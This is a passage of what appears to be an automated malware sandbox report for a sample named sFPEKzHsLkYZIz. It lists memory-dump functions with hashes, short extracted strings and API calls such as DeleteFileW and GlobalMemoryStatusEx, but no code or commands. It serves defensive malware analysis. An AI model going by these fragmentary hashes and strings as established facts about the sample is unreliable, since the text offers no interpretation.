                                                                                      • Instruction ID: f7248a6a2b7b7d1da6db1f4ed88d0e9b4193cf88d85ff4ebb096aaf65f695601
                                                                                      • Opcode Fuzzy Hash: 133c5eefcdf977f4a0dcf7723bfa594f03055be4ed863192ee40d3bd5a979db6
                                                                                      • Instruction Fuzzy Hash: EF025C30E002098FDBA5EFA8D584AAEB7F2FB45310F14856AE405EB355DB35DC86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: a8a795d286bf9f711a33cceb490a62ee38050d3c30653c570a51fa83edf6d509
                                                                                      • Instruction ID: 0936a7d525e73a13e66653b8a47ed3a7ea27c0395d2e98a28391bbf54306ac75
                                                                                      • Opcode Fuzzy Hash: a8a795d286bf9f711a33cceb490a62ee38050d3c30653c570a51fa83edf6d509
                                                                                      • Instruction Fuzzy Hash: 36915330B0060A9FDB55EF69D850BAF77F6AFC9204F14856AC409EB344DB349D46CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q
                                                                                      • API String ID: 0-831282457
                                                                                      • Opcode ID: c50b6204226a00b64caac859b73914218e2400219590d3a2e6dd60dd1fb9203d
                                                                                      • Instruction ID: 567b5078647eae074d0babdf415f4b5863a713b3a868a3cedc72e9cc009e6ccb
                                                                                      • Opcode Fuzzy Hash: c50b6204226a00b64caac859b73914218e2400219590d3a2e6dd60dd1fb9203d
                                                                                      • Instruction Fuzzy Hash: DC626130A006059FCB55EF68D590A5EB7F2FF84304F248A6AD0099F759DB71ED8ACB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq$\Ocq
                                                                                      • API String ID: 0-3575482020
                                                                                      • Opcode ID: d1dfc068fc6c06d4d3fa0c6330dec267c247eaa5059ae511cff4b453f55556e7
                                                                                      • Instruction ID: 10455c6a2a513af62de3de9cd3231d77421a18a61173844067b19c872fa00cd0
                                                                                      • Opcode Fuzzy Hash: d1dfc068fc6c06d4d3fa0c6330dec267c247eaa5059ae511cff4b453f55556e7
                                                                                      • Instruction Fuzzy Hash: B3618030F002099FEB55AFA5C8547AEBAF6EF88700F20842AE105EB395DB758D45CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q
                                                                                      • API String ID: 0-355816377
                                                                                      • Opcode ID: 3fb667a2f694d89ed99ee3a0c8e2e626107b27fb80ecfb449f78788bde49466f
                                                                                      • Instruction ID: 4a5df8bee6f27dfacf73fdc40cf4f976d4e03f7fba860e850bbb9fa43a92db57
                                                                                      • Opcode Fuzzy Hash: 3fb667a2f694d89ed99ee3a0c8e2e626107b27fb80ecfb449f78788bde49466f
                                                                                      • Instruction Fuzzy Hash: CF515030B005059FDB55EB78D890BAF77FAEBC8644F14856AD40ADB388EA34DD42CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: fcq$XPcq
                                                                                      • API String ID: 0-936005338
                                                                                      • Opcode ID: 0aa526659fedd06e4946f47f6141818f55a5014c56c0fe6c0076d26c6ca30ed3
                                                                                      • Instruction ID: 36a277327228dbc8b3c22d5620a02f5db63b9a8df70620d5c41fdb090f4879ec
                                                                                      • Opcode Fuzzy Hash: 0aa526659fedd06e4946f47f6141818f55a5014c56c0fe6c0076d26c6ca30ed3
                                                                                      • Instruction Fuzzy Hash: DC518E70F102089FEB559FB5C854BAEBBF6EF88700F20852AE105EB395DA758C458B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 2098 f58169-f581ba 2101 f581c2-f581ed DeleteFileW 2098->2101 2102 f581bc-f581bf 2098->2102 2103 f581f6-f5821e 2101->2103 2104 f581ef-f581f5 2101->2104 2102->2101 2104->2103
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F581E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 00F581E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteFile
                                                                                      • String ID:
                                                                                      • API String ID: 4033686569-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F5F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 00F5F167
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4122306471.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_f50000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9ca21efa93a981e93db643781b41591597d861084bfe8a37a595a70f22e73c83
                                                                                      • Instruction ID: c117fa82306d54492493a93497b31f200497e2a08de62f260e9601044eebc369
                                                                                      • Opcode Fuzzy Hash: 9ca21efa93a981e93db643781b41591597d861084bfe8a37a595a70f22e73c83
                                                                                      • Instruction Fuzzy Hash: 25317230E002058FDFBAAF69C4C066FBBB1EB45320F61996BD459EB342C634D941CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ab405fe8307c7ed0bae39ad68814eb2f6b8886ce221a66488c4023a4a856600b
                                                                                      • Instruction ID: 07426f8a71b21f296999cb6304afe3c057720cc6b864996ac75adf9130f6c2c4
                                                                                      • Opcode Fuzzy Hash: ab405fe8307c7ed0bae39ad68814eb2f6b8886ce221a66488c4023a4a856600b
                                                                                      • Instruction Fuzzy Hash: DF314F30E106069FDB55DFA4D8546AFBBF2FF89300F14852AE906A7350DBB1A942CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a77ee8f70eee3a8ea21e665c9ce1f84dc32a7ab10a66c5dc8d1579542d9347f7
                                                                                      • Instruction ID: 94a9c1fb20e707c623fa413d2f3f52b9864b1d37e00450b1f31b6851559a5ed5
                                                                                      • Opcode Fuzzy Hash: a77ee8f70eee3a8ea21e665c9ce1f84dc32a7ab10a66c5dc8d1579542d9347f7
                                                                                      • Instruction Fuzzy Hash: ED317E30E106069FCB56DFA4D85469FB7F2BF89300F24852AE906E7340DBB1AD42CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4e07c23074598ad29e857bea5abb09589b6baf7a7070219a959b7e37c3470d7
                                                                                      • Instruction ID: 9b71b924c292a406c4cd4e194e7fc4889ed37f2e9ca62c4992a1b84a8e854386
                                                                                      • Opcode Fuzzy Hash: e4e07c23074598ad29e857bea5abb09589b6baf7a7070219a959b7e37c3470d7
                                                                                      • Instruction Fuzzy Hash: 1F213B75F006159FDB42DFA8D880AAEBBF2EB48710F148066E905EB394E735D912CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 913a617173b930b2a2bcede2492f55b83dbf5785164225c7021f732a93e2aad5
                                                                                      • Instruction ID: 87e306753df405f8b301372f6bf43eb765c364162e1695416a0951a1354f96c9
                                                                                      • Opcode Fuzzy Hash: 913a617173b930b2a2bcede2492f55b83dbf5785164225c7021f732a93e2aad5
                                                                                      • Instruction Fuzzy Hash: 18219C75F006059FDB42EFA8D880AAEB7F2FB48710F14806AEA05E7350E735D801CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4118257509.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_b7d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3bcc986f2a9db89436c353da362745bc069b1355f2bfb84cc65d310a128bd8b2
                                                                                      • Instruction ID: 4353174da9d96aee7741ba462623df412f3880ee0cfb4c24a8c82e74ea18c8ef
                                                                                      • Opcode Fuzzy Hash: 3bcc986f2a9db89436c353da362745bc069b1355f2bfb84cc65d310a128bd8b2
                                                                                      • Instruction Fuzzy Hash: F121FF71604204EFCB14DF24C9D4B26BBB5FF84354F24C6ADE84E4B292C73AD846CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 377fa7cb1b099917afa2a500e3ce69822d3ac4f0d964337a26d9786982d4d27a
                                                                                      • Instruction ID: 8a4298d5439266d174c891c52badf735f437e1b496f548b995d03ec7d294026b
                                                                                      • Opcode Fuzzy Hash: 377fa7cb1b099917afa2a500e3ce69822d3ac4f0d964337a26d9786982d4d27a
                                                                                      • Instruction Fuzzy Hash: D001F530B041111FDB66A6BDA810BAFBBDADBC6750F14447BF50AC7751DA29CC028391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b70ae374c4a04078afad570e68ffbeed8bcac326588f87e6668e9d94799fe854
                                                                                      • Instruction ID: 7be00e0756f4287550e36f28eb2bc157661322050535ced66975b6c058ab7b31
                                                                                      • Opcode Fuzzy Hash: b70ae374c4a04078afad570e68ffbeed8bcac326588f87e6668e9d94799fe854
                                                                                      • Instruction Fuzzy Hash: 16118E31B101299FDB55AA68DC14AAF73EBEBC9714F00453AD90AE7344EE699C028BD1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0fb0e855087a3e6f9794f4837545d911682f62833f2a12d12f6712bff5796525
                                                                                      • Instruction ID: 6f13601ee9d80debff2bb4f2d2e87f4938a7d5e7364f33d3cb186373a06c4c93
                                                                                      • Opcode Fuzzy Hash: 0fb0e855087a3e6f9794f4837545d911682f62833f2a12d12f6712bff5796525
                                                                                      • Instruction Fuzzy Hash: 2201B532B104255FDB65A668DC10AEF72AEDBC9610F004136E50AD7344EE649C0287E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 082cdeb052ec232e895b192e30c050202d1b3e327401162c732a882ed8d88c51
                                                                                      • Instruction ID: 1cdce36ec78ba6852e264d0d00335e67b66c0f4816eacf8349142390894a7dba
                                                                                      • Opcode Fuzzy Hash: 082cdeb052ec232e895b192e30c050202d1b3e327401162c732a882ed8d88c51
                                                                                      • Instruction Fuzzy Hash: C001F530B041501FDB56A6BCD85072F77EADBCA654F14846BE509CB341DE25DC0683E2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfd26b81af3bdadc500c8cfe90222ea6651867bb7485ce87f4f97ffa27bed3e4
                                                                                      • Instruction ID: 029e09fe3710b0cef73b23b76309f12e1ab270700dfcb5d5bbc6bebbcb858954
                                                                                      • Opcode Fuzzy Hash: cfd26b81af3bdadc500c8cfe90222ea6651867bb7485ce87f4f97ffa27bed3e4
                                                                                      • Instruction Fuzzy Hash: 5021BFB5901259EFCB10DF9AD884ACEFFF8FB48310F10812AE958A7240C375A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b7aa2cbc98898fb91c01eab5fee2cbfa00b4fb3ff7972749b55037b839c273c7
                                                                                      • Instruction ID: 730363bfb66a91f5f71e0f211309a62a6b058704d81e38edfb9e8dfe8d70fde1
                                                                                      • Opcode Fuzzy Hash: b7aa2cbc98898fb91c01eab5fee2cbfa00b4fb3ff7972749b55037b839c273c7
                                                                                      • Instruction Fuzzy Hash: 8F018430B015105FDB62E67CE850B2FBBD9EB87714F1484BBE50AC7751DA25DC428791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4118257509.0000000000B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B7D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_b7d000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 741a7e55d15d60c9973da3e48aeb494857abb15eda7bfdc1cbdf30666b038d52
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: 8611BB75504284CFCB11CF10C9C4B16BFB2FB84314F28C6AAD8494B652C33AD84ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2530695c808189c04176bdfcbaf86322065c7794e87d4b2e4cb87c5355d522d3
                                                                                      • Instruction ID: 861e2943e9bca02088bb181518aeda8fc6bb8adb8a402aab7e25868300cf9770
                                                                                      • Opcode Fuzzy Hash: 2530695c808189c04176bdfcbaf86322065c7794e87d4b2e4cb87c5355d522d3
                                                                                      • Instruction Fuzzy Hash: 8D11AFB5D01259AFCB00DF9AD884ADEFBF4FB48724F10812AE918A7240C374A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ef21a0a889b58d5dec49d9a0321410ecaa1f6f3d7ca759897817cdacb773b20e
                                                                                      • Instruction ID: 703633b5dbebd9273e3e20d9ad925735c9374b02a67e2e5387fc5e352a34e1f2
                                                                                      • Opcode Fuzzy Hash: ef21a0a889b58d5dec49d9a0321410ecaa1f6f3d7ca759897817cdacb773b20e
                                                                                      • Instruction Fuzzy Hash: 3401D131B100110FDB65A6BDA450B6FA7DBDBC9750F10883BE10EC7740EE29DC028385
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9373a347887cd0efb66a69c4377bc1356e94527e2bab7744edf7befaf31c74ba
                                                                                      • Instruction ID: 21cc7f016ab74cdbe06d61cd99edba05c0f647c07cb74ca39860839430e178b3
                                                                                      • Opcode Fuzzy Hash: 9373a347887cd0efb66a69c4377bc1356e94527e2bab7744edf7befaf31c74ba
                                                                                      • Instruction Fuzzy Hash: B1018135F100101FDBA6A6BDD85072F66DADBC9754F14843AE50ACB340DE65DC0683D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2222239885
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-390881366
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000D.00000002.4168198526.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_13_2_6480000_sFPEKzHsLkYZIz.jbxd
